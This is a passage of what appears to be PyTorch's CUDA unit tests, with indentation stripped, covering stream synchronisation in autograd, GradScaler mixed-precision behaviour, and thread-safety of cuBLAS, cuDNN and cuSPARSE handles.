# torch.cuda._sleep such that if the race condition exists, the test will almost certainly fail,
# but there's a chance it may spuriously pass. Passing does not guarantee the backend is bug-free,
# but failure does guarantee there is a bug.
fwd_bwd_op_stream = torch.cuda.Stream()
bwd_ambient_stream = torch.cuda.Stream()
# We need these streams to be different otherwise the test is meaningless.
self.assertTrue(fwd_bwd_op_stream != bwd_ambient_stream)
size = int(1e3)
a = torch.full((size,), 2.0, device="cuda", requires_grad=True)
b = torch.full((size,), 3.0, device="cuda", requires_grad=True)
# I don't think we need any manual record_streams below.
# a and b remain in scope for the entire test.
# c and grad remain in scope for each iteration, and there's a full sync between iterations.
for trial in range(5):
torch.cuda.synchronize()
a.grad = b.grad = None
with torch.cuda.stream(fwd_bwd_op_stream):
c = a * b
with torch.cuda.stream(bwd_ambient_stream):
torch.cuda.synchronize()
# Long-running dummy kernel on bwd_ambient_stream delays filling of grad
torch.cuda._sleep(int(50 * get_cycles_per_ms()))
# Fills grad on bwd_ambient_stream
grad = torch.full((size,), float(trial + 1), device="cuda")
# Bwd ops still run on fwd_bwd_op_stream, so the following will likely fail if
# bwd ops don't sync with bwd_ambient_stream before consuming grad.
torch.autograd.backward(tensors=c, grad_tensors=grad)
# See https://github.com/pytorch/pytorch/issues/47028
# The assertEqual checks below run on bwd_ambient_stream, so this test may also fail
# if backward() fails to sync with bwd_ambient_stream at the end.
# Synchronizing here works around the issue until a proper fix can be made.
torch.cuda.synchronize()
with torch.no_grad():
self.assertEqual(a.grad, grad * b)
self.assertEqual(b.grad, grad * a)
def test_streaming_backwards_callback(self):
# Tests if autograd callbacks sync properly with respect to leaf streams and
# the user-facing stream surrounding backward(). If it fails, first suspect is
# sync logic where "final_callbacks_" are called in torch/csrc/autograd/engine.cpp
MultiplyInStream = self._make_multiply_in_stream()
size = int(1e3)
a = torch.full((size,), 1, device="cuda", dtype=torch.float, requires_grad=True)
b = torch.full((size,), 1, device="cuda", dtype=torch.float, requires_grad=True)
s0 = torch.cuda.Stream()
s1 = torch.cuda.Stream()
s2 = torch.cuda.Stream()
stash = []
# sets up a nontrivial structure of leaf streams
s0.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s0):
c = MultiplyInStream.apply(a, 2)
s1.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s1):
d = MultiplyInStream.apply(b, 3)
s1.wait_stream(s0)
e = c * d
def clone_leaf_grads():
stash.append(a.grad.clone())
stash.append(b.grad.clone())
# Use a hook on e to install the callback
e.register_hook(lambda grad: torch.autograd.Variable._execution_engine.queue_callback(clone_leaf_grads))
s2.wait_stream(s1)
with torch.cuda.stream(s2):
e.sum().backward()
# The autograd engine should sync s2 with all leaf streams then run the callback clone_leaf_grads on s2.
# If those things happened properly, checking the values of the cloned grads on s2 should be safe:
self.assertEqual(stash[0], torch.full_like(a, 6))
self.assertEqual(stash[1], torch.full_like(a, 6))
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
@unittest.skipIf(IS_SANDCASTLE or IS_REMOTE_GPU, "Does not work on Sandcastle")
def test_cuda_init_race(self):
# See https://github.com/pytorch/pytorch/issues/16559
import subprocess
subprocess.check_call([sys.executable, '-c', """\
import torch
import threading
def worker(rank):
torch.tensor([1.]).cuda(rank)
t1 = threading.Thread(target=worker, args=(0,))
t2 = threading.Thread(target=worker, args=(1,))
t1.start()
t2.start()
"""])
def test_fixed_cuda_assert_async(self):
with self.assertRaisesRegex(RuntimeError, "Boolean value of Tensor with no values is ambiguous"):
torch._assert_async(torch.tensor([], device="cuda"))
with self.assertRaisesRegex(RuntimeError, "Boolean value of Tensor with more than one value is ambiguous"):
torch._assert_async(torch.tensor([0, 0], device="cuda"))
torch._assert_async(torch.tensor(1, device="cuda"))
torch._assert_async(torch.tensor(0.1, device="cuda"))
torch._assert_async(torch.tensor(-0.1, device="cuda"))
torch._assert_async(torch.tensor(True, device="cuda"))
torch._assert_async(torch.tensor(0 + 0.1j, device="cuda"))
fail_stmts = [
"torch._assert_async(torch.tensor(0, device='cuda'))",
"torch._assert_async(torch.tensor(0.0, device='cuda'))",
"torch._assert_async(torch.tensor(False, device='cuda'))",
"torch._assert_async(torch.tensor(0 + 0j, device='cuda'))",
]
import subprocess
for stmt in fail_stmts:
with self.subTest(stmt=stmt):
r = subprocess.call([sys.executable, '-c', f"""\
import torch
{stmt}
torch.cuda.synchronize()
"""])
self.assertTrue(r != 0)
def test_grad_scaling_unscale(self, dtype=torch.float):
inv_scale = torch.full((1,), 0.25, dtype=torch.float, device="cuda:0")
found_inf = torch.full((1,), 0.0, dtype=torch.float, device="cuda:0")
size = 10
g = torch.full((size, size), 4.0, dtype=dtype, device="cuda:0")
ginf = g.clone()
ginf[2, 2] = float('inf')
gnan = g.clone()
gnan[2, 2] = float('nan')
# Tries selected combinations of
# - contiguous grads
# - g.clone().t() which is not contiguous but still non overlapping and dense
# - variants of g.clone()[:, :5] which are not non overlapping and dense
# Non overlapping and dense grads route into a multi tensor apply kernel,
# others use a fallback per-tensor kernel, so we should try both.
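# ("Non overlapping and dense" means the tensor covers its storage with no gaps and no
# element aliasing: e.g. g.clone().t() qualifies even though it is not contiguous, while
# g.clone()[:, :5] does not, because it skips over part of each storage row.)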
cases = (
([g.clone(), g.clone()], False),
([g.clone(), g.clone().t()], False),
([g.clone(), g.clone()[:, :5]], False),
([g.clone()[:, :5], g.clone()[:, :5]], False),
([g.clone(), ginf.clone()], True),
([g.clone(), gnan.clone()], True),
([g.clone(), ginf.clone()[:, :5]], True),
([g.clone(), gnan.clone()[:, :5]], True),
([ginf.clone(), g.clone()[:, :5]], True),
([ginf.clone()[:, :5], g.clone()[:, :5]], True),
)
for grads, has_inf in cases:
found_inf.zero_()
torch._amp_foreach_non_finite_check_and_unscale_(grads, found_inf, inv_scale)
if has_inf:
self.assertEqual(found_inf, 1.0)
else:
self.assertEqual(found_inf, 0.0)
for grad in grads:
self.assertEqual(grad, torch.ones_like(grad), rtol=1e-5, atol=1e-7)
# When passing lists with mismatched dtypes to a raw
# _amp_foreach_non_finite_check_and_unscale_ call,
# it's expected to fall back to the single-tensor TensorIterator kernel.
grads = [g.clone(), g.to(dtype=torch.float16)]
torch._amp_foreach_non_finite_check_and_unscale_(grads, found_inf, inv_scale)
for grad in grads:
self.assertEqual(grad, torch.ones_like(grad), rtol=1e-5, atol=1e-7)
# Passing lists with mismatched devices to a raw
# _amp_foreach_non_finite_check_and_unscale_ call should raise errors.
if TEST_MULTIGPU:
with self.assertRaisesRegex(RuntimeError, r"Expected all tensors to be on the same device"):
torch._amp_foreach_non_finite_check_and_unscale_([g.clone(), g.to(device="cuda:1")],
found_inf,
inv_scale)
# Creates a list of grads with mismatched dtypes and devices, to ensure
# scaler._unscale_grads_ organizes grads by dtype and device before calling
# _amp_foreach_non_finite_check_and_unscale_ on each set.
# If inject_inf >= 0, writes an inf into one grad for _unscale_grads_ to find.
def perfect_storm_grads(inject_inf):
grads = [g.clone(), g.clone()[:, :5], g.to(dtype=torch.float16), g.to(dtype=torch.float16)]
if TEST_MULTIGPU:
grads += [g.to(device="cuda:1"),
g.to(device="cuda:1")[:, :5],
g.to(device="cuda:1", dtype=torch.float16),
g.to(device="cuda:1", dtype=torch.float16)]
if inject_inf >= 0:
grads[inject_inf][2, 2] = float('inf')
return grads
scaler = torch.cuda.amp.GradScaler()
dummy_params = [torch.empty_like(g) for g in perfect_storm_grads(-1)]
dummy_opt = torch.optim.SGD(dummy_params, lr=1.)
# Ensures the inf/nan checking can find an inf injected onto any grad in the perfect storm.
for inject_inf in range(-1, len(dummy_params)):
found_inf = torch.full((1,), 0.0, dtype=torch.float, device="cuda:0")
grads = perfect_storm_grads(inject_inf)
for i, p in enumerate(dummy_params):
p.grad = grads[i]
found_inf_per_device = scaler._unscale_grads_(dummy_opt, inv_scale, found_inf, True)
if inject_inf < 0:
# No inf was injected, ensures unscaling worked normally.
self.assertTrue(sum(v.item() for v in found_inf_per_device.values()) == 0)
for grad in grads:
self.assertEqual(grad, torch.ones_like(grad), rtol=1e-5, atol=1e-7)
else:
# inf was injected, ensures inf was found.
self.assertTrue(sum(v.item() for v in found_inf_per_device.values()) == 1)
def test_grad_scaling_update_scale(self, device="cuda", dtype=torch.float):
growth = 2.0
backoff = 0.25
growth_interval = 2
scale = torch.full((1,), 4.0, dtype=dtype, device=device)
growth_tracker = torch.full((1,), 0.0, dtype=torch.int32, device=device)
found_inf = torch.full((1,), 0.0, dtype=torch.float, device="cuda:0")
# Simulates 2 consecutive unskipped iterations
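# (With growth_interval=2, the scale only grows every 2nd consecutive unskipped step:
#  step 1 leaves the scale at 4.0 and bumps growth_tracker to 1; step 2 resets the tracker
#  and multiplies the scale by growth -> 4.0 * 2.0 = 8.0. A later skipped step multiplies
#  the scale by backoff -> 8.0 * 0.25 = 2.0 and resets the tracker, as checked below.)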
torch._amp_update_scale_(scale, growth_tracker, found_inf, growth, backoff, growth_interval)
self.assertEqual(growth_tracker, 1)
self.assertEqual(scale, 4.0)
torch._amp_update_scale_(scale, growth_tracker, found_inf, growth, backoff, growth_interval)
self.assertEqual(growth_tracker, 0)
self.assertEqual(scale, 8.0)
# Simulates a skipped iteration
found_inf.fill_(1.0)
torch._amp_update_scale_(scale, growth_tracker, found_inf, growth, backoff, growth_interval)
self.assertEqual(growth_tracker, 0)
self.assertEqual(scale, 2.0)
def test_grad_scaling_unscale_sparse(self, device="cuda", dtype=torch.float):
scaler = torch.cuda.amp.GradScaler()
inv_scale = torch.full((1,), 0.25, dtype=dtype, device=device)
found_inf = torch.empty((1,), dtype=dtype, device=device)
cur = found_inf.device
# As of d0c925f (4/16/20), docs are unclear about best API for sparse cuda tensor construction.
# https://pytorch.org/docs/master/tensors.html shows torch.sparse_coo_tensor(...), but it has no docstring.
# The same page shows several tensors with layout=torch.sparse_coo, but no constructors using that layout.
# Meanwhile, https://pytorch.org/docs/master/sparse.html shows torch.sparse.FloatTensor(...), which looks
# legacy and does not accept a device="cuda" kwarg. Going with torch.sparse_coo_tensor.
i = torch.tensor([[0, 1, 1],
[2, 0, 2]], device="cuda", dtype=torch.int64)
v = torch.tensor([16., 32., 64.], device="cuda", dtype=torch.float)
s = torch.sparse_coo_tensor(i, v, torch.Size([2, 3]), device="cuda", dtype=dtype)
p = s.clone()
assert p.is_sparse
opt = torch.optim.SGD([p], lr=1.)
p.grad = s.clone()
found_inf.zero_()
found_inf = scaler._unscale_grads_(opt, inv_scale, found_inf, False)[cur]
self.assertEqual(found_inf, 0.0)
self.assertEqual(p.grad.to_dense(), (s / 4).to_dense())
v = torch.FloatTensor([16., 32., float('inf')])
p.grad = torch.sparse_coo_tensor(i, v, torch.Size([2, 3]), device="cuda", dtype=dtype)
found_inf.zero_()
found_inf = scaler._unscale_grads_(opt, inv_scale, found_inf, False)[cur]
self.assertEqual(found_inf, 1.0)
v = torch.FloatTensor([16., 32., float('nan')])
p.grad = torch.sparse_coo_tensor(i, v, torch.Size([2, 3]), device="cuda", dtype=dtype)
found_inf.zero_()
found_inf = scaler._unscale_grads_(opt, inv_scale, found_inf, False)[cur]
self.assertEqual(found_inf, 1.0)
p = s.clone().half()
assert p.is_sparse
opt = torch.optim.SGD([p], lr=1.)
p.grad = s.clone().half()
found_inf.zero_()
found_inf = scaler._unscale_grads_(opt, inv_scale, found_inf, True)[cur]
self.assertEqual(found_inf, 0.0)
self.assertEqual(p.grad.to_dense(), (s.half() / 4).to_dense())
# Creates fp16 sparse tensor with duplicated indices (uncoalesced). The uncoalesced representation
# does not overflow in fp16, but the coalesced representation would, because 64000 + 64000 > fp16 max.
# _amp_non_finite_check_and_unscale_ should report an overflow here.
i = torch.LongTensor([[0, 1, 0],
[2, 0, 2]])
v = torch.FloatTensor([64000., 32., 64000.])
p.grad = torch.sparse_coo_tensor(i, v, torch.Size([2, 3]), device="cuda", dtype=torch.float16)
found_inf.zero_()
found_inf = scaler._unscale_grads_(opt, inv_scale, found_inf, True)[cur]
self.assertEqual(found_inf, 1.0)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_grad_scaling_device_as_key(self):
# Ensure that different instances of "device" objects that point to the same device
# are treated as identical keys by dicts. GradScaler relies on this behavior, and may
# error otherwise in a way that's difficult to detect (a silent performance hit).
d = {}
t = torch.empty((1,), device="cuda:0")
dev0a = torch.device("cuda:0")
dev0b = torch.device("cuda:0")
dev1a = torch.device("cuda:1")
dev1b = torch.device("cuda:1")
self.assertTrue(hash(dev0a) == hash(dev0b))
self.assertTrue(hash(dev1a) == hash(dev1b))
d[dev0a] = "0a"
d[dev0b] = "0b"
self.assertTrue(len(d) == 1)
self.assertTrue(d[dev0a] == "0b")
d[t.device] = "t"
self.assertTrue(len(d) == 1)
self.assertTrue(d[dev0a] == "t")
d[dev1a] = "1a"
d[dev1b] = "1b"
self.assertTrue(len(d) == 2)
self.assertTrue(d[dev1a] == "1b")
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_grad_scaling_scale(self):
scaler = torch.cuda.amp.GradScaler(init_scale=2.)
t0 = torch.full((1,), 4.0, dtype=torch.float32, device="cuda:0")
t1 = torch.full((1,), 4.0, dtype=torch.float32, device="cuda:1")
# Create some nested iterables of tensors on different devices.
outputs = (t1.clone(), (t0.clone(), t1.clone()), [t0.clone(), (t1.clone(), t0.clone())])
outputs = scaler.scale(outputs)
self.assertTrue(outputs[0] == 8.0 and outputs[1][0] == 8.0 and outputs[1][1] == 8.0 and
outputs[2][0] == 8.0 and outputs[2][1][0] == 8.0 and outputs[2][1][1] == 8.0)
self.assertTrue(scaler._scale.device == t1.device)
def test_grad_scaling_state_dict(self):
for lazy_init_scale in True, False:
s0 = torch.cuda.amp.GradScaler(init_scale=3., growth_factor=4., backoff_factor=.5, growth_interval=2)
s1 = torch.cuda.amp.GradScaler(init_scale=6., growth_factor=7., backoff_factor=.8, growth_interval=1)
# sets a dummy value for load_state_dict to overwrite
s1._init_growth_tracker = 7
if lazy_init_scale:
# Dummy scale() call to ensure the scale tensor is lazily initialized.
s1.scale(torch.full((1,), 4.0, dtype=torch.float32, device="cuda:0"))
self.assertTrue(isinstance(s1._scale, torch.cuda.FloatTensor))
s1.load_state_dict(s0.state_dict())
self.assertEqual(s1.get_scale(), 3.)
self.assertEqual(s1.get_growth_factor(), 4.)
self.assertEqual(s1.get_backoff_factor(), .5)
self.assertEqual(s1.get_growth_interval(), 2)
self.assertEqual(s1._init_growth_tracker, 0)
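# The scaling tests below compare a scaled run against an unscaled control run.
# For reference, the usage pattern they exercise is roughly the following sketch
# (assuming a generic model/optimizer/loss_fn; not part of the test suite):
#
#     scaler = torch.cuda.amp.GradScaler()
#     for input, target in data:
#         optimizer.zero_grad()
#         with torch.autocast('cuda'):
#             loss = loss_fn(model(input), target)
#         scaler.scale(loss).backward()
#         scaler.step(optimizer)   # skips the step if infs/nans were found in grads
#         scaler.update()          # grows or backs off the scale accordingly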
def _create_scaling_models_optimizers(self, device="cuda"):
# Create a module+optimizer that will use scaling, and a control module+optimizer
# that will not use scaling, against which the scaling-enabled module+optimizer can be compared.
mod_control = torch.nn.Sequential(torch.nn.Linear(8, 8), torch.nn.Linear(8, 8)).to(device=device)
mod_scaling = torch.nn.Sequential(torch.nn.Linear(8, 8), torch.nn.Linear(8, 8)).to(device=device)
for c, s in zip(mod_control.parameters(), mod_scaling.parameters()):
s.data.copy_(c.data)
opt_control = torch.optim.SGD(mod_control.parameters(), lr=1.0)
opt_scaling = torch.optim.SGD(mod_scaling.parameters(), lr=1.0)
return mod_control, mod_scaling, opt_control, opt_scaling
def _create_scaling_case(self, device="cuda", dtype=torch.float):
data = [(torch.randn((8, 8), dtype=dtype, device=device), torch.randn((8, 8), dtype=dtype, device=device)),
(torch.randn((8, 8), dtype=dtype, device=device), torch.randn((8, 8), dtype=dtype, device=device)),
(torch.randn((8, 8), dtype=dtype, device=device), torch.randn((8, 8), dtype=dtype, device=device)),
(torch.randn((8, 8), dtype=dtype, device=device), torch.randn((8, 8), dtype=dtype, device=device))]
loss_fn = torch.nn.MSELoss().cuda()
skip_iter = 2
return self._create_scaling_models_optimizers(device=device) + (data, loss_fn, skip_iter)
# _run_scaling_case generalizes some single-optimizer test logic to avoid too much copy-pasting below.
def _run_scaling_case(self, run, unskipped, skipped, atol=1e-7):
# Ensure scaling can be disabled without changing user control flow.
for enabled in True, False:
mod_control, mod_scaling, opt_control, opt_scaling, data, loss_fn, skip_iter = self._create_scaling_case()
# For functionality, test with a modest initial scale, and an unrealistically-large growth factor
# so any potential errors with the growth factor handling will be magnified.
scaler = torch.cuda.amp.GradScaler(init_scale=128., growth_factor=2.0, enabled=enabled, growth_interval=1)
_ = run(data, mod_control, opt_control, scaler, loss_fn, skip_iter, False)
ret = run(data, mod_scaling, opt_scaling, scaler, loss_fn, skip_iter, True)
# Allows run() to optionally return a different scaler instance.
scaler = ret if ret else scaler
# If scaling was enabled, the scale factor should have been multiplied by the growth factor
# len(data) - skipped times and the backoff factor "skipped" times.
if enabled:
net_growth = scaler.get_growth_factor()**unskipped if unskipped > 0 else 1.0
net_backoff = scaler.get_backoff_factor()**skipped if skipped > 0 else 1.0
self.assertTrue(scaler.get_scale() == (128. * net_growth * net_backoff))
else:
self.assertTrue(scaler.get_scale() == 1.0)
for c, s in zip(mod_control.parameters(), mod_scaling.parameters()):
self.assertEqual(c, s, atol=atol, rtol=1e-05)
# Compares no scaling + no autocasting against scaling + autocasting.
def test_grad_scaling_autocast(self):
try_pickle = False
def run(data, model, optimizer, scaler, loss_fn, skip_iter, try_scaling_api):
for i, (input, target) in enumerate(data):
optimizer.zero_grad()
with torch.autocast('cuda', enabled=try_scaling_api):
output = model(input)
loss = loss_fn(output, target)
if try_scaling_api:
scaler.scale(loss).backward()
if i == skip_iter and scaler.is_enabled():
model[1].weight.grad.data.fill_(float('inf'))
scaler.step(optimizer)
scaler.update()
if try_pickle:
scaler = pickle.loads(pickle.dumps(scaler))
else:
loss.backward()
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer.step()
return scaler
# sets atol=1e-3 because we're comparing pure fp32 arithmetic vs a mixture of fp16 and fp32
self._run_scaling_case(run, unskipped=3, skipped=1, atol=1e-3)
# this will be picked up by try_pickle within run():
try_pickle = True
self._run_scaling_case(run, unskipped=3, skipped=1, atol=1e-3)
def test_grad_scaling_clipping(self):
def run(data, model, optimizer, scaler, loss_fn, skip_iter, try_scaling_api):
max_norm = 0.2 # A reasonable value that actually has an effect, based on printouts of grads
for i, (input, target) in enumerate(data):
optimizer.zero_grad()
output = model(input)
loss = loss_fn(output, target)
if try_scaling_api:
scaler.scale(loss).backward()
torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm * scaler.get_scale())
if i == skip_iter and scaler.is_enabled():
model[1].weight.grad.data.fill_(float('inf'))
scaler.step(optimizer)
scaler.update()
else:
loss.backward()
torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm)
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer.step()
self._run_scaling_case(run, unskipped=3, skipped=1, atol=1e-5)
def test_grad_scaling_clipping_separate_unscale(self):
def run(data, model, optimizer, scaler, loss_fn, skip_iter, try_scaling_api):
max_norm = 0.2 # A reasonable value that actually has an effect, based on printouts of grads
for i, (input, target) in enumerate(data):
optimizer.zero_grad()
output = model(input)
loss = loss_fn(output, target)
if try_scaling_api:
scaler.scale(loss).backward()
if i == skip_iter and scaler.is_enabled():
model[1].weight.grad.data.fill_(float('inf'))
scaler.unscale_(optimizer)
torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm, error_if_nonfinite=False)
scaler.step(optimizer)
scaler.update()
else:
loss.backward()
torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm)
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer.step()
self._run_scaling_case(run, unskipped=3, skipped=1)
@unittest.skipIf(IS_WINDOWS, 'FIXME: fix this test for Windows')
def test_grad_scaling_penalty(self):
def run(data, model, optimizer, scaler, loss_fn, skip_iter, try_scaling_api):
for i, (input, target) in enumerate(data):
optimizer.zero_grad()
output = model(input)
loss = loss_fn(output, target)
if try_scaling_api:
grad_params = torch.autograd.grad(scaler.scale(loss),
model.parameters(), create_graph=True)
inv_scale = 1. / scaler.get_scale()
grad_params = [p * inv_scale for p in grad_params]
else:
grad_params = torch.autograd.grad(loss, model.parameters(), create_graph=True)
grad_norm = 0
for grad in grad_params:
grad_norm += grad.pow(2).sum()
grad_norm = grad_norm.sqrt()
loss = loss + grad_norm
if try_scaling_api:
scaler.scale(loss).backward()
if i == skip_iter and scaler.is_enabled():
model[1].weight.grad.data.fill_(float('inf'))
scaler.step(optimizer)
scaler.update()
else:
loss.backward()
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer.step()
self._run_scaling_case(run, unskipped=3, skipped=1)
def test_grad_scaling_accumulation(self):
def run(data, model, optimizer, scaler, loss_fn, skip_iter, try_scaling_api):
iters_to_accumulate = 2
for i, (input, target) in enumerate(data):
output = model(input)
loss = loss_fn(output, target)
loss = loss / iters_to_accumulate
if try_scaling_api:
scaler.scale(loss).backward()
else:
loss.backward()
if (i + 1) % iters_to_accumulate == 0:
if try_scaling_api:
scaler.step(optimizer)
scaler.update()
optimizer.zero_grad()
else:
optimizer.step()
optimizer.zero_grad()
self._run_scaling_case(run, unskipped=2, skipped=0)
def test_grad_scaling_multiple(self):
# Tests gradient scaling with 2 models and 2 optimizers that both receive gradients from 2 losses.
# Some of the logic here cannot reuse the generic helper functions created for the 1-optimizer cases.
for enabled in True, False:
mod_control0, mod_scaling0, opt_control0, opt_scaling0, data, loss_fn, skip_iter = \
self._create_scaling_case()
mod_control1, mod_scaling1, opt_control1, opt_scaling1 = \
self._create_scaling_models_optimizers()
scaler = torch.cuda.amp.GradScaler(init_scale=128., growth_factor=2.0, enabled=enabled, growth_interval=1)
def run(model0, model1, optimizer0, optimizer1, try_scaling_api):
for i, (input, target) in enumerate(data):
optimizer0.zero_grad()
optimizer1.zero_grad()
output0 = model0(input)
output1 = model1(input)
loss0 = loss_fn(0.3 * output0 + 0.7 * output1, target)
loss1 = loss_fn(0.6 * output0 - 0.4 * output1, target)
if try_scaling_api:
scaler.scale(loss0).backward(retain_graph=True)
scaler.scale(loss1).backward()
if i == skip_iter and scaler.is_enabled():
model1[1].weight.grad.data.fill_(float('inf'))
# As an additional stress test, separately unscale for one of the optimizers.
scaler.unscale_(optimizer0)
scaler.step(optimizer0)
scaler.step(optimizer1)
scaler.update()
else:
loss0.backward(retain_graph=True)
loss1.backward()
optimizer0.step()
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer1.step()
run(mod_control0, mod_control1, opt_control0, opt_control1, False)
run(mod_scaling0, mod_scaling1, opt_scaling0, opt_scaling1, True)
# The loss scale should have been multiplied by the growth factor 3 times and the backoff factor once.
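# (The data has 4 iterations and exactly one of them, skip_iter, injects an inf into a grad,
#  so with growth_interval=1 there are 3 growth updates and 1 backoff update.)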
self.assertTrue(scaler.get_scale() == (128. * scaler.get_growth_factor()**3 *
scaler.get_backoff_factor()**1) if enabled else 1.0)
for c, s in zip(chain(mod_control0.parameters(), mod_control1.parameters()),
chain(mod_scaling0.parameters(), mod_scaling1.parameters())):
self.assertEqual(c, s, rtol=1e-5, atol=1e-7)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_grad_scaling_multigpu(self):
# Same as above, but runs some of the models on device 1.
# GradScaler should transparently handle losses and gradients on multiple devices.
# This test could be combined with the test above, but I think it makes sense to treat
# multi-GPU operations separately.
dev0 = torch.device("cuda:0")
dev1 = torch.device("cuda:1")
for enabled in True, False:
mod_control0, mod_scaling0, opt_control0, opt_scaling0, data, loss_fn, skip_iter = \
self._create_scaling_case()
mod_control1, mod_scaling1, opt_control1, opt_scaling1 = \
self._create_scaling_models_optimizers(device=dev1)
scaler = torch.cuda.amp.GradScaler(init_scale=128., growth_factor=2.0, enabled=enabled, growth_interval=1)
def run(model0, model1, optimizer0, optimizer1, try_scaling_api):
for i, (input, target) in enumerate(data):
optimizer0.zero_grad()
optimizer1.zero_grad()
output0 = model0(input)
output1 = model1(input.to(dev1))
loss0 = loss_fn(0.3 * output0 + 0.7 * output1.to(dev0), target)
loss1 = loss_fn(0.6 * output0.to(dev1) - 0.4 * output1, target.to(dev1))
if try_scaling_api:
scaler.scale(loss0).backward(retain_graph=True)
scaler.scale(loss1).backward()
if i == skip_iter and scaler.is_enabled():
model1[1].weight.grad.data.fill_(float('inf'))
# As an additional stress test, separately unscale for one of the optimizers.
scaler.unscale_(optimizer0)
scaler.step(optimizer0)
scaler.step(optimizer1)
# Make sure the found_infs were collected properly across optimizers and devices.
if scaler.is_enabled():
self.assertTrue(len(scaler._found_inf_per_device(optimizer0)) == 1)
self.assertTrue(len(scaler._found_inf_per_device(optimizer1)) == 1)
self.assertTrue(scaler._found_inf_per_device(optimizer0)[dev0].item() == 0.)
self.assertTrue(scaler._found_inf_per_device(optimizer1)[dev1].item() ==
float(i == skip_iter))
scaler.update()
else:
loss0.backward(retain_graph=True)
loss1.backward()
optimizer0.step()
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer1.step()
run(mod_control0, mod_control1, opt_control0, opt_control1, False)
run(mod_scaling0, mod_scaling1, opt_scaling0, opt_scaling1, True)
# The loss scale should have been multiplied by the growth factor 3 times and the backoff factor once.
self.assertTrue(scaler.get_scale() == (128. * scaler.get_growth_factor()**3 *
scaler.get_backoff_factor()**1) if enabled else 1.0)
# Copy mod_control1 and mod_scaling1 back to device 0 for comparison
mod_control1.to(dev0)
mod_scaling1.to(dev0)
for c, s in zip(chain(mod_control0.parameters(), mod_control1.parameters()),
chain(mod_scaling0.parameters(), mod_scaling1.parameters())):
self.assertEqual(c, s, rtol=1e-5, atol=1e-7)
def test_cublas_multiple_threads_same_device(self):
# Note: these parameters should be tuned very carefully.
# A number that is too small makes it hard for the race condition
# to happen, while one that is too large sometimes causes a hang.
size = 1024
num_threads = 2
trials = 3
test_iters = 100
weight = torch.ones((size, size), device='cuda')
results = {}
barrier = threading.Barrier(num_threads)
def _worker(t):
my_stream = torch.cuda.Stream()
# Hard sync so we don't need to worry about creating and using tensors
# across streams or the fact that default streams are thread-local.
# Those issues are not the target of this test.
torch.cuda.synchronize()
# Line up threads to increase likelihood of race conditions.
barrier.wait()
with torch.cuda.stream(my_stream):
for i in range(test_iters):
# If all threads are sharing the same cublas handle,
# the following sequence may occur:
# thread 0 calls cublasSetStream()
# thread 1 calls cublasSetStream()
# thread 0 launches its raw gemm, which it thinks is in
# its own stream, but is actually in thread 1's stream.
# thread 0 enqueues its div_, which IS in its own stream,
# but actually now races with its gemm.
results[t] = torch.mm(results[t], weight)
results[t].div_(float(size))
torch.cuda.synchronize()
for _ in range(trials):
for t in range(num_threads):
results[t] = torch.ones((size, size), device='cuda')
threads = [threading.Thread(target=_worker,
args=(t,)) for t in range(num_threads)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
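# Each iteration multiplies an all-ones matrix by the all-ones weight (every entry
# becomes `size`) and then divides by `size`, so the result should stay all ones
# and its sum should be size * size.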
for t in range(num_threads):
self.assertEqual(results[t].sum().item(), size * size)
# Test is flaky on Windows (https://github.com/pytorch/pytorch/issues/57401)
@unittest.skipIf(IS_WINDOWS, 'Test is flaky on Windows (see issue 57401)')
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
@skipIfRocm
def test_cudnn_multiple_threads_same_device(self):
# This function is intended to test the lazy creation and reuse of per-thread
# cudnn handles on each device in aten/src/ATen/cudnn/Handles.cpp.
# Failure here likely indicates something wrong with that logic.
weight = torch.ones((1, 1, 2, 2), device='cuda')
results = {}
num_threads = 2
trials = 3
test_iters = 1000
barrier = threading.Barrier(num_threads)
with torch.backends.cudnn.flags(enabled=True):
def _worker(t):
my_stream = torch.cuda.Stream()
# Hard sync so we don't need to worry about creating and using tensors
# across streams or the fact that default streams are thread-local.
# Those issues are not the target of this test.
torch.cuda.synchronize()
# Line up threads to increase likelihood of race conditions.
barrier.wait()
with torch.cuda.stream(my_stream):
for _ in range(test_iters):
# If all threads are sharing the same cudnn handle,
# the following sequence may occur:
# thread 0 calls setCuDNNStreamToCurrent()
# thread 1 calls setCuDNNStreamToCurrent()
# thread 0 launches its raw convolution, which it thinks is in
# its own stream, but is actually in thread 1's stream.
# thread 0 enqueues its div_, which IS in its own stream,
# but now races with its convolution.
results[t] = torch.nn.functional.conv2d(results[t], weight, padding=0)
results[t].div_(4.0)
torch.cuda.synchronize()
for _ in range(trials):
for t in range(num_threads):
results[t] = torch.ones((1, 1, 2048, 2048), device='cuda')
threads = [threading.Thread(target=_worker,
args=(t,)) for t in range(num_threads)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
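# Each conv2d with a 2x2 all-ones kernel and no padding shrinks each spatial dim by 1
# and produces 4s, which div_(4.0) turns back into ones; after test_iters iterations
# the all-ones result is (2048 - test_iters) x (2048 - test_iters), hence the expected sum.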
for t in range(num_threads):
self.assertEqual(results[t].sum().item(),
(2048 - test_iters) * (2048 - test_iters))
def test_cusparse_multiple_threads_same_device(self):
size = 1024
num_threads = 2
trials = 3
test_iters = 500
def ones_sparse(size):
a = torch.arange(size, device='cuda')
indices = torch.cartesian_prod(a, a).t()
values = torch.ones(size * size, device='cuda')
return torch.sparse_coo_tensor(indices, values)
weight = ones_sparse(size)
results = {}
barrier = threading.Barrier(num_threads)
def _worker(t):
my_stream = torch.cuda.Stream()
# Hard sync so we don't need to worry about creating and using tensors
# across streams or the fact that default streams are thread-local.
# Those issues are not the target of this test.
torch.cuda.synchronize()
# Line up threads to increase likelihood of race conditions.
barrier.wait()
with torch.cuda.stream(my_stream):
for i in range(test_iters):
# If all threads are sharing the same cublas handle,
